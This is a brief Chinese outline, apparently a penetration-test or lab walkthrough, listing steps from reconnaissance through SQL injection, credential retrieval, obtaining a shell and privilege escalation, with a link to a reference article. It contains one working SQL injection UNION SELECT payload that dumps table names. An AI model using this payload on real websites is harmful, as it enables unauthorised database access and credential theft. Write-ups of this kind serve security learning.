信息收集 进行目标的IP查询 进行目标的访问 看到了SQL注入的注入点,进行尝试: union select group_concat(0x7e,table_name) from information_schema.tables where table_schema=database() 获取用户与密码; 获取交互式shell: 提权 进行脚本的使用: 参考文章:https://www.freesion.com/article/92351385482/